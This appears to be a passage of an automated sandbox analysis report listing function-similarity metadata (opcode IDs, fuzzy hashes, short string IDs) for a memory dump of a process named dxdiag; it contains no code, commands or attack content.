                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0
                                                                                          • API String ID: 0-4108050209
                                                                                          • Opcode ID: 0a169f153f05d81556b97ec1d982402f44b1193e7a5d9548232ad9bc2a2d11b7
                                                                                          • Instruction ID: b52eb51231fc900eaadc8c81f457622f3f0b6f51af79dcbe8e0f809c0597da3a
                                                                                          • Opcode Fuzzy Hash: 0a169f153f05d81556b97ec1d982402f44b1193e7a5d9548232ad9bc2a2d11b7
                                                                                          • Instruction Fuzzy Hash: 98912733658A9007C72C5D7C4C752AABA934BDA230F2E937EA9B2CB3E1D52988065355
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ~
                                                                                          • API String ID: 0-1707062198
                                                                                          • Opcode ID: 72c13701696192dfc20109577999103ecfce46bb15957d77df2543678485ee00
                                                                                          • Instruction ID: fedad1c06f0065ecafef613c73bdfc631541caa38951d67b42794b4cc961db47
                                                                                          • Opcode Fuzzy Hash: 72c13701696192dfc20109577999103ecfce46bb15957d77df2543678485ee00
                                                                                          • Instruction Fuzzy Hash: 218139B29042615FC7258E28C84179BBBD1AB85324F19C23EECB99B392D6389C46D7D1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ,
                                                                                          • API String ID: 0-3772416878
                                                                                          • Opcode ID: 7fae2f255a8fd2d56763f8beb58fcdc8fb186e5576eac22f9c3d66becbf538f0
                                                                                          • Instruction ID: a3ef299c5e7e977cc5b7504a12919924ad54ea5109b9e3e5b2e920edd53b1c89
                                                                                          • Opcode Fuzzy Hash: 7fae2f255a8fd2d56763f8beb58fcdc8fb186e5576eac22f9c3d66becbf538f0
                                                                                          • Instruction Fuzzy Hash: 34B138711097819FD325CF18C88061BFBE0AFA9704F444A2EF5D997782D635EA18CBA7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: cba`
                                                                                          • API String ID: 2994545307-1926275841
                                                                                          • Opcode ID: 4dd138133c70bccffe0cc9a23b0a33065d47b40352575896815e93fde00f8469
                                                                                          • Instruction ID: 41ff4bfae8fb92d3e53a90846de56666ce7534d916a86ba38ef6454eea79fcdf
                                                                                          • Opcode Fuzzy Hash: 4dd138133c70bccffe0cc9a23b0a33065d47b40352575896815e93fde00f8469
                                                                                          • Instruction Fuzzy Hash: 3A717435A483009FDB189F28C890B3BB7A2EB99314F19557ED4D3877A1D6359C10CB8B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: "
                                                                                          • API String ID: 0-123907689
                                                                                          • Opcode ID: 1bde58d3ad00dbcf7b211c85afe0c87ae7ec8536041c5ee7d742fbdcfbaf8b1e
                                                                                          • Instruction ID: d68b1a9088298affc1ec5bd7052a8a4f753d8ac7f88c6c36173fe7236f557df2
                                                                                          • Opcode Fuzzy Hash: 1bde58d3ad00dbcf7b211c85afe0c87ae7ec8536041c5ee7d742fbdcfbaf8b1e
                                                                                          • Instruction Fuzzy Hash: A271E7327087254BD724D96DAC8022BB6C35BC6330F59876AECB48B3E5D6788C25478B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: "
                                                                                          • API String ID: 0-123907689
                                                                                          • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                          • Instruction ID: 1b0d155936ea343f35509df964668f6b6c6c9246b28269455b7de3af52c0cfb1
                                                                                          • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                          • Instruction Fuzzy Hash: D271E632B183254BD714CE28E58031BBBE3ABC5710F99856EE9949B391D238EC55C78B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: geA
                                                                                          • API String ID: 2994545307-2877876819
                                                                                          • Opcode ID: 0ed91a1389df4b0d1597c695a4cf1e86b50c493ccd7e372dad384ac748f0d08a
                                                                                          • Instruction ID: 4108c2f34951b7525a129208e7cca88797c90dd01fa32db8498efb649337b20a
                                                                                          • Opcode Fuzzy Hash: 0ed91a1389df4b0d1597c695a4cf1e86b50c493ccd7e372dad384ac748f0d08a
                                                                                          • Instruction Fuzzy Hash: E251BB382057009FE7258F15D891B7377A3FBA5304F1A95BED9964B7A2C378EC818B18
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: gfff
                                                                                          • API String ID: 0-1553575800
                                                                                          • Opcode ID: 8248bf5bba180cae314aa3b7782ac89fbaa7f630bd2b14a9a196c8932c7ed6be
                                                                                          • Instruction ID: 0bba36978a619e9ace30c92abe038fd16205fb4e8e7e125fe9cc28a2c01b1cf5
                                                                                          • Opcode Fuzzy Hash: 8248bf5bba180cae314aa3b7782ac89fbaa7f630bd2b14a9a196c8932c7ed6be
                                                                                          • Instruction Fuzzy Hash: 2171E675600B01CFE725CF29C891BA7B7E2FB85314F18866ED496CB395DB38A841CB85
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: `pd-
                                                                                          • API String ID: 0-182301337
                                                                                          • Opcode ID: 47f7bfaf72026e9969934b5e11cdcc6e3b8d9cbf3a8d33e766c69dc0c14565ff
                                                                                          • Instruction ID: 78c49deb105515400a20ed237f8c3f66f9dc959da60051c669d51e2c98e4fb21
                                                                                          • Opcode Fuzzy Hash: 47f7bfaf72026e9969934b5e11cdcc6e3b8d9cbf3a8d33e766c69dc0c14565ff
                                                                                          • Instruction Fuzzy Hash: 2451F1313083914ED7358F2698507ABBBE2AFE3314F98495DC4C48B352CB78440ACB97
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: "=B
                                                                                          • API String ID: 0-917644190
                                                                                          • Opcode ID: 73ee633447d1f6527620aa035fe6b16ff7cfc22686ac84a0026da8caab8e01c4
                                                                                          • Instruction ID: 70b728ef6d1fc5c2b8b8217b551a53d6a46a102b77591c7a10914c981e2bb08e
                                                                                          • Opcode Fuzzy Hash: 73ee633447d1f6527620aa035fe6b16ff7cfc22686ac84a0026da8caab8e01c4
                                                                                          • Instruction Fuzzy Hash: 8C5146766083409FE324CF55EC41B8BBBE5EBC9318F01093DF9989B281D77499458B86
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: "=B
                                                                                          • API String ID: 0-917644190
                                                                                          • Opcode ID: 87923f1b82e6d903aa9b4cb5920547b117a2f3132df7c57e5b2419fbd84656b7
                                                                                          • Instruction ID: 73ac25a76f381af8135e2a387910311b2f1a205358cbb29a076b9eb775738f57
                                                                                          • Opcode Fuzzy Hash: 87923f1b82e6d903aa9b4cb5920547b117a2f3132df7c57e5b2419fbd84656b7
                                                                                          • Instruction Fuzzy Hash: 6E5123766083009FD320CF68EC41B5BBBE5EBC9318F05493DF998A7291D7B5A944CB86
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 1_B
                                                                                          • API String ID: 0-2132359058
                                                                                          • Opcode ID: ebd4713a8c839dd888d4ddf57068d90824b288b6a5d2fb2c475a76c4d08f8f2d
                                                                                          • Instruction ID: 5b09de0f708086b2db089408e795921656c95d083517461b5049a84f32a7c51a
                                                                                          • Opcode Fuzzy Hash: ebd4713a8c839dd888d4ddf57068d90824b288b6a5d2fb2c475a76c4d08f8f2d
                                                                                          • Instruction Fuzzy Hash: D8415972D09B7487C230DA64A81017BB6D5DB85310F9A847FF9C697342EB38AD01A7CA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: CUUI
                                                                                          • API String ID: 0-173970609
                                                                                          • Opcode ID: 11d751ef2c6838004d4261e70f5839909a1e0ffe6a220f83fd188cfbbc9468dc
                                                                                          • Instruction ID: 633f9cfe08b78efd1148aada0c0c4a0bea52aba14bf5254293374e99ea80dff2
                                                                                          • Opcode Fuzzy Hash: 11d751ef2c6838004d4261e70f5839909a1e0ffe6a220f83fd188cfbbc9468dc
                                                                                          • Instruction Fuzzy Hash: 9541E7A020C7E08ADB358F2594903ABBBE1DFD3304F5884ADC6C56B243C77988068B5A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: cba`
                                                                                          • API String ID: 2994545307-1926275841
                                                                                          • Opcode ID: e363ae243e25186fafc727a7c143fe84283cddf713b74be5aabea9aa04b6da8b
                                                                                          • Instruction ID: beb69707a00ddb1e0f288a180930159145dfafadf277c1aff9f3426dfcb85bde
                                                                                          • Opcode Fuzzy Hash: e363ae243e25186fafc727a7c143fe84283cddf713b74be5aabea9aa04b6da8b
                                                                                          • Instruction Fuzzy Hash: 47113536A44B204BC324CE289DC163777E1AB95314F95263DDCA9D33A1E278EC009AD9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8802ac95f26bb5af3ecf3f7a2b500b8189bbcbbf06de9955977d9ebab7cb66b1
                                                                                          • Instruction ID: edd93262c37b58514c164f54ade4d824c10fc5bc9ac2c1e3e29676a09bcbb007
                                                                                          • Opcode Fuzzy Hash: 8802ac95f26bb5af3ecf3f7a2b500b8189bbcbbf06de9955977d9ebab7cb66b1
                                                                                          • Instruction Fuzzy Hash: 3452F2715083458FCB15CF14C0906AABFE1BF89309F19897EF8996B381D778E949CB89
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 55742de4044c27391ea92b1462ef5243d561474e095cc6f8668b73f9f426c153
                                                                                          • Instruction ID: 6437c18af3090e7d1f8450d5b6d6604a09e5e8e249e1d84bd2a5865c6d55a9b7
                                                                                          • Opcode Fuzzy Hash: 55742de4044c27391ea92b1462ef5243d561474e095cc6f8668b73f9f426c153
                                                                                          • Instruction Fuzzy Hash: E952D170A08B848FE730DF24C4843A7BBE1AB51314F15893ED5E716BC2C37DA995871A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0d4bbca7605c98e1b6c9e6aef409a34f692d1b492f4abcb5f515763d830ea422
                                                                                          • Instruction ID: 997a0c5a4a6b9d14cc3762cd8dc21844e49b77d9c632dc490a8703620003f9aa
                                                                                          • Opcode Fuzzy Hash: 0d4bbca7605c98e1b6c9e6aef409a34f692d1b492f4abcb5f515763d830ea422
                                                                                          • Instruction Fuzzy Hash: CF626AB0608B808ED366CF3C8845797BFE5AB5A314F044A5EE0EF97392C7766501CB66
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b4f2b084faef48d893cec2519f241ff843f37aefc35a02b9a69ce986de1685e5
                                                                                          • Instruction ID: af49202ca076376fa415bca2a3091a328854806cafe53c7e33487b358e5641c5
                                                                                          • Opcode Fuzzy Hash: b4f2b084faef48d893cec2519f241ff843f37aefc35a02b9a69ce986de1685e5
                                                                                          • Instruction Fuzzy Hash: 9722B332A087118BD725DF18D9806ABB3E1BFC4319F19893ED986A7385D738B851CB47
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8100fdb123d3d67b19287db521d51e445f5757672122b2ae3053109a734df6eb
                                                                                          • Instruction ID: 2867989e2e87d2432c5fc8213db3c9c19056031c0356c708892e03b139116c05
                                                                                          • Opcode Fuzzy Hash: 8100fdb123d3d67b19287db521d51e445f5757672122b2ae3053109a734df6eb
                                                                                          • Instruction Fuzzy Hash: 85321975A04B408FD714DF38C5853ABBBE1AF89314F158A3ED9EB87391D638A445CB06
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 68019969ff5d4c7b031af40bff766dd307ec9a2b607195fd915788becbc0be47
                                                                                          • Instruction ID: a966f5733580e1d32f4c65cf1d7ea4f7c70424fa85ad0b362746f1f47da8c6bd
                                                                                          • Opcode Fuzzy Hash: 68019969ff5d4c7b031af40bff766dd307ec9a2b607195fd915788becbc0be47
                                                                                          • Instruction Fuzzy Hash: 51322370914B118FC328CF29C68052ABBF5BF45711B604A2ED6A7A7F90D73AF945CB18
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 86b120d65a92fc5bdbbef3624e805ea907a676f62533a2aebf6e078355a3b7f7
                                                                                          • Instruction ID: a0fb517757f1b8da7777bae7579d9f52a382c29ac2183c4fd28747a7d9f1db1e
                                                                                          • Opcode Fuzzy Hash: 86b120d65a92fc5bdbbef3624e805ea907a676f62533a2aebf6e078355a3b7f7
                                                                                          • Instruction Fuzzy Hash: F402127AB04216CFC704CF28E8906AAB7F2FB8A311F1A847ED58593351D734AD55CB86
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d076b9d010211f014a59fe34b7121c93ea0654b322b9de3976980b709a020c0e
                                                                                          • Instruction ID: 0188f3e029ce03e8205a7a452b25b6dbd5bcd661a0513372e50984eaaf58ab41
                                                                                          • Opcode Fuzzy Hash: d076b9d010211f014a59fe34b7121c93ea0654b322b9de3976980b709a020c0e
                                                                                          • Instruction Fuzzy Hash: 98E12F79B04216CFC704CF68E8906AAB7F2FB8A312F1A847EE585D3351D334A955CB85
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 72ef3389d17b5c2d7356fca882b754ee43f181ee348d4ceda7fd19fbe0bcaa8a
                                                                                          • Instruction ID: 292f23283d7cd07bb6fd19c8603031892cd16be448e450c68c3e166b8ce1a4f1
                                                                                          • Opcode Fuzzy Hash: 72ef3389d17b5c2d7356fca882b754ee43f181ee348d4ceda7fd19fbe0bcaa8a
                                                                                          • Instruction Fuzzy Hash: DAF1CF356087418FD724CF29C88066BFBE2EFD9304F08882EE5D597791E679E904CB5A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 93d26f108f2de207715fc6f10add082af5f215719a41695db71f3f1b1a317cd7
                                                                                          • Instruction ID: 7e3e12de7baaa44855f8db402cbcde809cdcecebdba36db7e067ef3f383e20fe
                                                                                          • Opcode Fuzzy Hash: 93d26f108f2de207715fc6f10add082af5f215719a41695db71f3f1b1a317cd7
                                                                                          • Instruction Fuzzy Hash: 81D1047A614352DBCB185F38EC51267B3E1FF4A701F4A88BDD881872A0F7BAC9508755
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ff2cf1cd491ada9ea90d45eb0a802c840e982093fe7b1125ecbb9c6834ee2d8a
                                                                                          • Instruction ID: 8f523c3615630e9e86e7780e2c956a708ca21de1340e8773491381c9913ea244
                                                                                          • Opcode Fuzzy Hash: ff2cf1cd491ada9ea90d45eb0a802c840e982093fe7b1125ecbb9c6834ee2d8a
                                                                                          • Instruction Fuzzy Hash: BFE12B716087415BC318CE29D9E026FFBD2ABC5320F18CA6EE4E6573E5EB3889058B45
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 536c392115e0cff150cd0d6d8dc87b4614f7e511d1c43d6d4655b511f952909a
                                                                                          • Instruction ID: b7c2eaf3338182462aad9b41d84ad1057b9f4e6ab3b7739cdaab2d2094e4d2b6
                                                                                          • Opcode Fuzzy Hash: 536c392115e0cff150cd0d6d8dc87b4614f7e511d1c43d6d4655b511f952909a
                                                                                          • Instruction Fuzzy Hash: 36C1007AA04216CFC704CF28E8906AAB7F2FB8A311F1A447DE98593351D734ED54CB85
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0698e5323aca3189bcf61449c470d5166dbf916172f2457ca70a618e1c4aeee2
                                                                                          • Instruction ID: 56b07d3b8ecf2697cfceb0b79347f06369642de1c8fee68a0e9743baf01ab03d
                                                                                          • Opcode Fuzzy Hash: 0698e5323aca3189bcf61449c470d5166dbf916172f2457ca70a618e1c4aeee2
                                                                                          • Instruction Fuzzy Hash: 46C12EB060D3218AC314DF14D86272BB7F2EF92364F44891DF0D19B395EB789905CB9A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b7ae3e85a33d43a6e2771b0fd908fe387ca734c2f104cbcf9b416a7aefdf7c9a
                                                                                          • Instruction ID: 20c8691d40d2db25294344e9a87d3a2a4619c2758e90d916e0ff6e9b3fbd9dce
                                                                                          • Opcode Fuzzy Hash: b7ae3e85a33d43a6e2771b0fd908fe387ca734c2f104cbcf9b416a7aefdf7c9a
                                                                                          • Instruction Fuzzy Hash: 95B1FE7AA14216CFC704CF68E8906AAB7F1FB8A311F1A447EE98693350D734ED54CB85
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 80da30ceeb4076c4dd52f36f413b417ec497b075dc979d5065cc3afacb8a27d8
                                                                                          • Instruction ID: 21034efda10b007e5f49382b2671dc2907a6127a70d9abf3c6f7e0d751ba39ee
                                                                                          • Opcode Fuzzy Hash: 80da30ceeb4076c4dd52f36f413b417ec497b075dc979d5065cc3afacb8a27d8
                                                                                          • Instruction Fuzzy Hash: 49B127357093559FC724CF26C890A6BB7E2AFE9314F19D63DE885473A2DA389C01C789
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fc05906a2cd7047f79f16b5ec2f82067cc14c0beb5821a18253c96a7a105a64b
                                                                                          • Instruction ID: 02c91c5c175dbfc798e5ae80a92b3f6d79b9f3e28c5cee1d4de64ad44bd3bbdb
                                                                                          • Opcode Fuzzy Hash: fc05906a2cd7047f79f16b5ec2f82067cc14c0beb5821a18253c96a7a105a64b
                                                                                          • Instruction Fuzzy Hash: 28B1FE79A08216CFC704CF28E8906AAB7F1FB8A311F1A487DE985D3350D734E955CB95
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 71e2b72de9db90adf160ba091cc0f4e0f3ea60225d0eeabf88c335e2ed5b0d7e
                                                                                          • Instruction ID: 5a7d6a52498181c9cf4f87941996139a214d8b31775e9e11dc627d5a44ad725e
                                                                                          • Opcode Fuzzy Hash: 71e2b72de9db90adf160ba091cc0f4e0f3ea60225d0eeabf88c335e2ed5b0d7e
                                                                                          • Instruction Fuzzy Hash: 73A143B46047418FD724CF29C8D1B63B7E2AB5A304F14892ED59A87792D338E886CB58
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b19b263321da8b47e4b3405e57df1c6045c2f410f851018c259a6ca0ecc375f5
                                                                                          • Instruction ID: d9bed95716bb0f9021933fded373194d370365f97eec4729a86d8bb3d406bb7e
                                                                                          • Opcode Fuzzy Hash: b19b263321da8b47e4b3405e57df1c6045c2f410f851018c259a6ca0ecc375f5
                                                                                          • Instruction Fuzzy Hash: E1B1E0755007018FC724CF29C8817A3B7F2FF95711B1A856ED8968B7A4DB38E842CB15
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: dc1db6a217cb8f63b2a4c53b2a12e6814aef47cb0c90e13827f5475dc9e5d2a9
                                                                                          • Instruction ID: 9bcc022de37c7c20ffa72b1ba7d3b9ce0567420977cb9b754fa16163635bd775
                                                                                          • Opcode Fuzzy Hash: dc1db6a217cb8f63b2a4c53b2a12e6814aef47cb0c90e13827f5475dc9e5d2a9
                                                                                          • Instruction Fuzzy Hash: 12C16BB29087418FC320CF28DC96BABB7E1BF85318F09493DD1DAD6242E778A155CB46
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2288887854.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_dxdiag.jbxd
